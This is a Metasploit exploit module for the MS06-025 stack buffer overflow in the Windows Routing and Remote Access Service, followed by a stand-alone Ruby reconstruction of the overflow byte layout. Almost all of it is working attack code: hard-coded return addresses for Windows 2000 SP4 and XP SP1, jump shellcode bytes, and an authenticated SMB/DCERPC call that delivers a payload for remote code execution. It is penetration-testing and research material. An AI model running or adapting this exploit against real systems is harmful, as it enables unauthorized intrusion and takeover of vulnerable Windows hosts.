##
# $Id: ms06_025_rras.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::DCERPC
	include Msf::Exploit::Remote::SMB

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft RRAS Service Overflow',
			'Description'    => %q{
				This module exploits a stack buffer overflow in the Windows Routing
				and Remote Access Service. Since the service is hosted inside
				svchost.exe, a failed exploit attempt can cause other system
				services to fail as well. A valid username and password are
				required to exploit this flaw on Windows 2000. When attacking
				XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
			},
			'Author'         =>
				[
					'Nicolas Pouvesle <nicolas.pouvesle [at] gmail.com>',
					'hdm'
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2006-2370' ],
					[ 'OSVDB', '26437' ],
					[ 'BID', '18325' ],
					[ 'MSB', 'MS06-025' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'           => 1104,
					'BadChars'        => "\x00",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 SP4', { 'Ret' => 0x7571c1e4 } ],
					[ 'Windows XP SP1',   { 'Ret' => 0x7248d4cc } ],
				],
			'DisclosureDate' => 'Jun 13 2006'))

		register_options(
			[
				OptString.new('SMBPIPE', [ true, "The pipe name to use (ROUTER, SRVSVC)", 'ROUTER']),
			], self.class)
	end

	# Post-authentication bugs are rarely useful during automation
	def autofilter
		false
	end

	def exploit
		connect()
		smb_login()

		# Bind to the vulnerable RRAS RPC interface over the named pipe chosen by SMBPIPE
		handle = dcerpc_handle(
			'20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
		)

		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")

		print_status('Getting OS...')

		# Check the remote OS name and version; the overflow layout differs per OS
		os = smb_peer_os
		pat = ''

		case os
		when /Windows 5\.0/
			# Windows 2000: payload first, then a short jmp over the filler and the
			# overwritten return address onto a jmp rel32 that lands back in the payload
			pat = payload.encoded +
				"\xeb\x06" + rand_text_alphanumeric(2) + [target.ret].pack('V') +
				"\xe9\xb7\xfb\xff\xff"
			os = 'Windows 2000'
		when /Windows 5\.1/
			# Windows XP SP1: 0x4c bytes of filler, a short jmp over the filler and the
			# overwritten return address, and the payload immediately after it
			pat = rand_text_alphanumeric(0x4c) +
				"\xeb\x06" + rand_text_alphanumeric(2) + [target.ret].pack('V') +
				payload.encoded
			os = 'Windows XP'
		end

		# Pad the request buffer to 0x4000 bytes and wrap it in the length-prefixed stub
		req = [1, 0x49].pack('VV') + pat + rand_text_alphanumeric(0x4000 - pat.length)
		len = req.length
		stb = NDR.long(0x20000) + NDR.long(len) + req + NDR.long(len)

		print_status("Calling the vulnerable function on #{os}...")
		begin
			dcerpc.call(0x0C, stb)
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
			# The service may never answer once the overflow has fired
		rescue => e
			# A torn-down pipe is expected after the overflow; anything else is a real error
			if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
				raise e
			end
		end

		# Cleanup handler
		disconnect
	end

end
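The two per-target layouts and the stub wrapper above, reconstructed as stand-alone Ruby so the byte layout can be checked offline without the framework. This is an added example, not code from the Metasploit module: the helper names (`ndr_long`, `build_pattern`, `build_stub`, `win2k_backjump_target`, `ret_offset`), the fixed filler characters standing in for `rand_text_alphanumeric`, and the 1104-byte NOP placeholder payload are assumptions of this example. The back-jump arithmetic assumes the encoded payload fills the full 1104-byte `Space`, as the module's layout implies.

```ruby
# Added example: reconstructs the overflow layouts and the RPC stub wrapper
# from the MS06-025 module in plain Ruby (no Rex/NDR), so the byte layout can
# be inspected offline. Helper names, the fixed filler characters and the NOP
# placeholder payload are this example's own assumptions, not Metasploit API.

REQ_SIZE      = 0x4000                          # module pads the request buffer to this size
PAYLOAD_SPACE = 1104                            # 'Space' from the module's Payload info
JMP_SHORT_6   = [0xeb, 0x06].pack('C*')         # jmp $+8: skips 2 filler bytes + 4 ret bytes
JMP_BACK      = [0xe9, 0xfffffbb7].pack('CV')   # jmp rel32, displacement -0x449 (-1097)

# Equivalent of NDR.long: 32-bit little-endian integer
def ndr_long(v)
  [v].pack('V')
end

# Per-target overflow pattern, mirroring the module's case statement.
# Filler is fixed ('AA', 'B'*0x4c, 'CC') instead of random for reproducibility.
def build_pattern(target, ret, payload)
  ret_le = [ret].pack('V')
  case target
  when :win2k
    # payload, then jmp +6 in front of the return address; the short jmp skips
    # the filler and the four ret bytes so execution continues on the rel32
    # jmp, which lands back inside the payload
    payload + JMP_SHORT_6 + 'AA' + ret_le + JMP_BACK
  when :winxp
    # 0x4c bytes of filler, jmp +6 over the filler/ret bytes, then the payload
    ('B' * 0x4c) + JMP_SHORT_6 + 'CC' + ret_le + payload
  else
    raise ArgumentError, "unsupported target #{target.inspect}"
  end
end

# The opnum 0x0C stub: [1, 0x49] header, pattern, padding to REQ_SIZE,
# wrapped as 0x20000, length, data, length (as the module builds it).
def build_stub(target, ret, payload)
  pat = build_pattern(target, ret, payload)
  raise "pattern (#{pat.length} bytes) exceeds #{REQ_SIZE}" if pat.length > REQ_SIZE
  req = [1, 0x49].pack('VV') + pat + ('D' * (REQ_SIZE - pat.length))
  len = req.length
  ndr_long(0x20000) + ndr_long(len) + req + ndr_long(len)
end

# Offset, relative to the pattern start, that the Windows 2000 rel32 jmp lands
# on for a payload of the given length. x86 rel32 is relative to the end of
# the 5-byte instruction.
def win2k_backjump_target(payload_len)
  e9_off = payload_len + JMP_SHORT_6.length + 2 + 4   # position of the e9 opcode
  disp   = JMP_BACK[1, 4].unpack('l<')[0]             # -1097
  e9_off + 5 + disp
end

# Byte offset of the overwritten return address inside the full stub.
def ret_offset(target, payload_len)
  header = 4 + 4 + 8   # 0x20000, len, [1, 0x49]
  case target
  when :win2k then header + payload_len + JMP_SHORT_6.length + 2
  when :winxp then header + 0x4c + JMP_SHORT_6.length + 2
  end
end

if __FILE__ == $0
  nops = [0x90].pack('C') * PAYLOAD_SPACE   # constructed placeholder payload
  stub = build_stub(:win2k, 0x7571c1e4, nops)
  puts "stub: #{stub.length} bytes, ret at offset #{ret_offset(:win2k, nops.length)}"
  puts "win2k back-jump lands at payload offset #{win2k_backjump_target(nops.length)}"
end
```

With a full 1104-byte payload the Windows 2000 rel32 jmp lands 20 bytes into the payload region, which is why that layout relies on the front of the encoded payload being safe to enter mid-way (a NOP sled); a shorter payload moves the landing point backwards, and a payload longer than `Space` would push it past the start of the pattern.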